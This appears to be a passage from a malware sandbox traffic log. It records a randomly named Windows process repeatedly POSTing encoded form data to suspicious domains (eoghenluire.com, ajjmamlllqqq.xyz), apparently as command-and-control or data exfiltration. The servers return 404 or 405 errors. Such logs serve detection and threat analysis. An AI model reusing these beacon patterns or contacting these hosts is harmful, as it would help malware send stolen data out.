                                                          Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxcore.css" rel="stylesheet"> <link href="//img1.wsimg.com/dps/css/customer-comp.css" rel="stylesheet"></head><body><div id="error-img"><img src="//img1.wsimg.com/dps/images/404_background.jpg"></div><div class="container text-center" id="error"> <div class="row"> <div class="col-md-12"> <div class="main-icon text-warning"><span class="uxicon uxicon-alert"></span></div> <h1>File not found (404 error)</h1> </div> </div> <div class="row"> <div class="col-md-6 col-md-push-3"> <p class="lead">If you think what you're looking for should be here, please contact the site owner.</p> </div>
                                                          Jul 3, 2024 15:57:00.665935993 CEST | 31 | IN | Data Raw: 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: </div></div></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          2 | 192.168.2.4 | 49739 | 76.223.105.230 | 80 | 1908 | C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 15:57:02.753685951 CEST | 755 | OUT | POST /i3r0/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 225
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.eoghenluire.com
                                                          Origin: http://www.eoghenluire.com
                                                          Referer: http://www.eoghenluire.com/i3r0/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 37 79 59 74 63 43 6d 45 33 5a 6e 50 53 49 37 65 39 52 35 6e 37 61 69 74 5a 48 78 46 30 49 56 75 32 36 6e 59 6e 54 6d 75 69 4d 52 36 30 66 52 74 36 2b 32 74 4a 4e 30 6b 62 61 38 52 79 57 4e 38 70 48 4b 32 52 4e 57 54 69 53 7a 2b 65 52 49 42 65 57 5a 61 64 4c 52 61 44 34 42 4d 50 34 77 6e 6d 2f 44 4d 31 55 48 67 46 36 78 44 2f 6f 74 78 48 71 34 49 38 2b 6f 4e 31 63 77 6b 62 69 5a 36 32 71 62 67 52 50 37 64 64 51 52 79 42 71 61 61 54 4d 62 41 46 43 70 49 77 6c 49 67 33 56 67 6c 65 46 67 4e 57 31 53 64 70 6e 58 4e 31 79 76 79 2f 52 63 31 38 63 51 58 33 53 44 52 34 73 4e 76 6c 7a 6f 4e 45 73 33 62 6d 47 49 36 2f 75 32 69 53 39 54 51 33 58 59 3d
                                                          Data Ascii: TvpPfhGp=7yYtcCmE3ZnPSI7e9R5n7aitZHxF0IVu26nYnTmuiMR60fRt6+2tJN0kba8RyWN8pHK2RNWTiSz+eRIBeWZadLRaD4BMP4wnm/DM1UHgF6xD/otxHq4I8+oN1cwkbiZ62qbgRP7ddQRyBqaaTMbAFCpIwlIg3VgleFgNW1SdpnXN1yvy/Rc18cQX3SDR4sNvlzoNEs3bmGI6/u2iS9TQ3XY=
                                                          Jul 3, 2024 15:57:03.250248909 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          content-type: text/html;charset=utf-8
                                                          content-length: 964
                                                          vary: Accept-Encoding
                                                          server: DPS/2.0.0+sha-aaf97e5
                                                          x-version: aaf97e5
                                                          x-siteid: us-east-1
                                                          set-cookie: dps_site_id=us-east-1; path=/
                                                          date: Wed, 03 Jul 2024 13:57:03 GMT
                                                          keep-alive: timeout=5
                                                          connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f 72 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 63 75 73 74 6f 6d 65 72 2d 63 6f 6d 70 2e 63 73 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxcore.css" rel="stylesheet"> <link href="//img1.wsimg.com/dps/css/customer-comp.css" rel="stylesheet"></head><body><div id="error-img"><img src="//img1.wsimg.com/dps/images/404_background.jpg"></div><div class="container text-center" id="error"> <div class="row"> <div class="col-md-12"> <div class="main-icon text-warning"><span class="uxicon uxicon-alert"></span></div> <h1>File not found (404 error)</h1> </div> </div> <div class="row"> <div class="col-md-6 col-md-push-3"> <p class="lead">If you think what you're looking for should be here, please contact the site owner.</p> </div>
                                                          Jul 3, 2024 15:57:03.250319004 CEST | 31 | IN | Data Raw: 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: </div></div></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          3 | 192.168.2.4 | 49740 | 76.223.105.230 | 80 | 1908 | C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 15:57:05.286130905 CEST | 10837 | OUT | POST /i3r0/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 10305
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.eoghenluire.com
                                                          Origin: http://www.eoghenluire.com
                                                          Referer: http://www.eoghenluire.com/i3r0/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 37 79 59 74 63 43 6d 45 33 5a 6e 50 53 49 37 65 39 52 35 6e 37 61 69 74 5a 48 78 46 30 49 56 75 32 36 6e 59 6e 54 6d 75 69 4d 5a 36 30 4d 5a 74 72 70 4b 74 4b 4e 30 6b 59 61 38 4d 79 57 4d 6d 70 48 53 71 52 4e 4b 44 69 51 37 2b 45 7a 41 42 57 46 42 61 54 4c 52 61 50 59 42 63 42 59 78 74 6d 2f 54 41 31 55 33 67 46 36 78 44 2f 70 64 78 42 37 34 49 36 2b 6f 4f 69 73 77 6f 51 43 5a 57 32 70 72 61 52 4f 37 4e 64 41 78 79 42 4c 6d 61 51 34 37 41 47 69 70 4b 7a 6c 49 34 33 56 39 2f 65 46 55 42 57 30 33 77 70 6b 4c 4e 30 55 2b 70 73 52 51 6c 2b 64 49 4a 30 6a 44 6e 38 63 51 6f 6f 77 31 7a 4b 66 7a 48 38 56 30 46 2f 75 47 72 48 64 37 6b 73 58 72 6c 47 56 65 61 71 6d 30 69 44 36 53 37 48 31 53 4e 38 52 59 71 6f 6b 51 33 4f 39 41 75 54 30 35 6a 4f 38 6e 7a 74 79 51 4c 54 37 50 32 46 42 51 30 65 50 58 35 36 67 77 6e 2b 46 49 4f 36 4a 41 44 79 56 79 50 44 48 47 73 4f 79 4c 62 79 6e 6b 4c 78 7a 68 6e 76 53 45 34 36 42 64 2f 4a 52 69 46 33 4b 2f 49 57 57 73 49 32 4b 55 33 6e 4c 76 44 64 [TRUNCATED]
                                                          Data Ascii: TvpPfhGp=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 [TRUNCATED]
                                                          Jul 3, 2024 15:57:05.759968996 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          content-type: text/html;charset=utf-8
                                                          content-length: 964
                                                          vary: Accept-Encoding
                                                          server: DPS/2.0.0+sha-aaf97e5
                                                          x-version: aaf97e5
                                                          x-siteid: us-east-1
                                                          set-cookie: dps_site_id=us-east-1; path=/
                                                          date: Wed, 03 Jul 2024 13:57:05 GMT
                                                          keep-alive: timeout=5
                                                          connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f 72 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 63 75 73 74 6f 6d 65 72 2d 63 6f 6d 70 2e 63 73 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxcore.css" rel="stylesheet"> <link href="//img1.wsimg.com/dps/css/customer-comp.css" rel="stylesheet"></head><body><div id="error-img"><img src="//img1.wsimg.com/dps/images/404_background.jpg"></div><div class="container text-center" id="error"> <div class="row"> <div class="col-md-12"> <div class="main-icon text-warning"><span class="uxicon uxicon-alert"></span></div> <h1>File not found (404 error)</h1> </div> </div> <div class="row"> <div class="col-md-6 col-md-push-3"> <p class="lead">If you think what you're looking for should be here, please contact the site owner.</p> </div>
Jul 3, 2024 15:57:05.760221004 CEST | 31 | IN | Data Raw: 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: </div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49741 | 76.223.105.230 | 80 | 1908 | C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 15:57:07.820550919 CEST | 464 | OUT | GET /i3r0/?TvpPfhGp=2wwNf3uh0L74coHFwFoEwJLZZncz0eUv2PDbuROkov9Y0f520r30B60Dc6sw70wr8VqsfcnHqRGaEDIOfEcEM+xuD/kdVb8f6u/HqHihPox78cRvPoIrzf8=&Y664G=SttDen986 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.eoghenluire.com
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
Jul 3, 2024 15:57:08.515039921 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          content-type: text/html;charset=utf-8
                                                          content-length: 964
                                                          vary: Accept-Encoding
                                                          server: DPS/2.0.0+sha-aaf97e5
                                                          x-version: aaf97e5
                                                          x-siteid: us-east-1
                                                          set-cookie: dps_site_id=us-east-1; path=/
                                                          date: Wed, 03 Jul 2024 13:57:08 GMT
                                                          keep-alive: timeout=5
                                                          connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f 72 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 63 75 73 74 6f 6d 65 72 2d 63 6f 6d 70 2e 63 73 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxcore.css" rel="stylesheet"> <link href="//img1.wsimg.com/dps/css/customer-comp.css" rel="stylesheet"></head><body><div id="error-img"><img src="//img1.wsimg.com/dps/images/404_background.jpg"></div><div class="container text-center" id="error"> <div class="row"> <div class="col-md-12"> <div class="main-icon text-warning"><span class="uxicon uxicon-alert"></span></div> <h1>File not found (404 error)</h1> </div> </div> <div class="row"> <div class="col-md-6 col-md-push-3"> <p class="lead">If you think what you're looking for should be here, please contact the site owner.</p> </div>
Jul 3, 2024 15:57:08.515057087 CEST | 31 | IN | Data Raw: 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: </div></div></body></html>
Jul 3, 2024 15:57:08.519464016 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          content-type: text/html;charset=utf-8
                                                          content-length: 964
                                                          vary: Accept-Encoding
                                                          server: DPS/2.0.0+sha-aaf97e5
                                                          x-version: aaf97e5
                                                          x-siteid: us-east-1
                                                          set-cookie: dps_site_id=us-east-1; path=/
                                                          date: Wed, 03 Jul 2024 13:57:08 GMT
                                                          keep-alive: timeout=5
                                                          connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f 72 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 63 75 73 74 6f 6d 65 72 2d 63 6f 6d 70 2e 63 73 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxcore.css" rel="stylesheet"> <link href="//img1.wsimg.com/dps/css/customer-comp.css" rel="stylesheet"></head><body><div id="error-img"><img src="//img1.wsimg.com/dps/images/404_background.jpg"></div><div class="container text-center" id="error"> <div class="row"> <div class="col-md-12"> <div class="main-icon text-warning"><span class="uxicon uxicon-alert"></span></div> <h1>File not found (404 error)</h1> </div> </div> <div class="row"> <div class="col-md-6 col-md-push-3"> <p class="lead">If you think what you're looking for should be here, please contact the site owner.</p> </div>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49742 | 35.244.172.47 | 80 | 1908 | C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 15:57:13.908701897 CEST | 738 | OUT | POST /5uz4/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 205
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.ajjmamlllqqq.xyz
                                                          Origin: http://www.ajjmamlllqqq.xyz
                                                          Referer: http://www.ajjmamlllqqq.xyz/5uz4/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 51 4a 51 38 6d 35 77 71 47 59 44 66 62 5a 6c 4f 34 59 68 59 65 64 72 64 63 42 61 52 66 55 65 7a 6e 41 74 4a 6e 5a 6b 72 5a 6a 4b 2b 71 31 50 32 70 67 61 38 55 47 43 6f 64 76 55 4d 74 48 4f 65 6d 49 63 72 2b 79 51 64 31 30 32 4d 4b 72 77 33 46 30 42 68 56 54 59 42 44 32 58 4f 62 69 37 51 45 72 6e 61 69 64 50 38 6d 39 30 4e 43 2b 6f 32 35 6f 47 65 4d 2b 7a 71 48 6f 41 7a 39 70 6f 44 37 44 35 34 53 46 74 50 51 51 4b 51 6f 4f 72 47 66 66 77 47 4f 6a 42 55 45 68 2f 73 5a 6e 6f 44 53 56 77 68 30 65 31 43 5a 59 4e 41 55 68 59 65 59 4e 64 79 77 6d 74 36 77 43 31 37 72 35 59 73 63 51 3d 3d
                                                          Data Ascii: TvpPfhGp=QJQ8m5wqGYDfbZlO4YhYedrdcBaRfUeznAtJnZkrZjK+q1P2pga8UGCodvUMtHOemIcr+yQd102MKrw3F0BhVTYBD2XObi7QErnaidP8m90NC+o25oGeM+zqHoAz9poD7D54SFtPQQKQoOrGffwGOjBUEh/sZnoDSVwh0e1CZYNAUhYeYNdywmt6wC17r5YscQ==
Jul 3, 2024 15:57:14.567435026 CEST | 333 | IN | HTTP/1.1 405 Method Not Allowed
                                                          Server: nginx/1.20.2
                                                          Date: Wed, 03 Jul 2024 13:57:14 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 157
                                                          Via: 1.1 google
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49743 | 35.244.172.47 | 80 | 1908 | C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 15:57:16.442389965 CEST | 758 | OUT | POST /5uz4/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 225
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.ajjmamlllqqq.xyz
                                                          Origin: http://www.ajjmamlllqqq.xyz
                                                          Referer: http://www.ajjmamlllqqq.xyz/5uz4/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 51 4a 51 38 6d 35 77 71 47 59 44 66 61 36 39 4f 37 2f 31 59 56 64 72 65 53 68 61 52 51 30 65 33 6e 41 68 4a 6e 59 77 37 59 52 65 2b 71 58 48 32 75 68 61 38 52 47 43 6f 53 50 55 46 7a 33 4f 76 6d 49 41 6a 2b 32 51 64 31 30 79 4d 4b 76 30 33 46 48 5a 69 61 6a 59 50 4d 57 58 4d 66 69 37 51 45 72 6e 61 69 63 2f 61 6d 39 38 4e 44 50 59 32 35 4a 47 5a 54 4f 7a 70 45 6f 41 7a 35 70 6f 50 37 44 35 67 53 45 78 31 51 57 57 51 6f 4c 48 47 66 4c 6b 46 46 6a 41 2b 4a 42 2b 39 64 58 6c 6b 66 77 38 71 36 4e 34 73 51 4d 42 6d 56 6e 4a 45 4a 38 38 6c 69 6d 4a 4a 74 46 38 50 6d 36 6c 6c 48 65 56 6b 53 62 67 50 46 53 68 6a 6b 64 41 7a 47 2f 77 75 79 36 4d 3d
                                                          Data Ascii: TvpPfhGp=QJQ8m5wqGYDfa69O7/1YVdreShaRQ0e3nAhJnYw7YRe+qXH2uha8RGCoSPUFz3OvmIAj+2Qd10yMKv03FHZiajYPMWXMfi7QErnaic/am98NDPY25JGZTOzpEoAz5poP7D5gSEx1QWWQoLHGfLkFFjA+JB+9dXlkfw8q6N4sQMBmVnJEJ88limJJtF8Pm6llHeVkSbgPFShjkdAzG/wuy6M=
Jul 3, 2024 15:57:17.101556063 CEST | 176 | IN | HTTP/1.1 405 Method Not Allowed
                                                          Server: nginx/1.20.2
                                                          Date: Wed, 03 Jul 2024 13:57:16 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 157
                                                          Via: 1.1 google
                                                          Connection: close
Jul 3, 2024 15:57:17.101614952 CEST | 157 | IN | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49744 | 35.244.172.47 | 80 | 1908 | C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 15:57:18.973505020 CEST | 10840 | OUT | POST /5uz4/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 10305
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.ajjmamlllqqq.xyz
                                                          Origin: http://www.ajjmamlllqqq.xyz
                                                          Referer: http://www.ajjmamlllqqq.xyz/5uz4/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 51 4a 51 38 6d 35 77 71 47 59 44 66 61 36 39 4f 37 2f 31 59 56 64 72 65 53 68 61 52 51 30 65 33 6e 41 68 4a 6e 59 77 37 59 51 6d 2b 71 45 66 32 6f 47 4f 38 53 47 43 6f 62 76 55 41 7a 33 4f 79 6d 49 59 6e 2b 32 56 71 31 32 61 4d 49 4b 67 33 44 79 31 69 42 7a 59 50 55 6d 58 4e 62 69 36 61 45 72 33 65 69 63 50 61 6d 39 38 4e 44 4e 41 32 2f 59 47 5a 41 65 7a 71 48 6f 41 2f 39 70 6f 72 37 48 56 65 53 45 6b 43 58 67 6d 51 6f 76 6e 47 65 34 63 46 5a 7a 42 59 4d 42 2b 6c 64 58 70 37 66 77 4a 54 36 4f 6c 33 51 4c 4a 6d 57 41 6b 69 62 4f 38 61 78 58 74 62 32 43 63 58 2f 49 56 47 4a 4f 78 36 52 4a 41 52 57 44 5a 73 70 63 39 6d 58 76 56 30 6a 4e 2b 43 37 36 6d 5a 4f 78 36 69 76 64 4f 76 7a 6e 47 64 31 79 48 6c 68 36 30 2f 34 36 38 38 64 30 78 56 6e 46 78 49 4b 4a 4d 37 62 44 6d 49 39 4b 44 6b 69 43 31 51 51 71 30 58 32 41 58 37 31 6e 47 65 6c 4c 34 57 66 64 42 32 4b 33 50 34 74 73 4f 76 68 5a 6d 32 66 45 61 66 43 37 63 49 43 75 55 44 30 70 34 75 75 72 38 41 71 78 4e 59 5a 5a 30 71 34 [TRUNCATED]
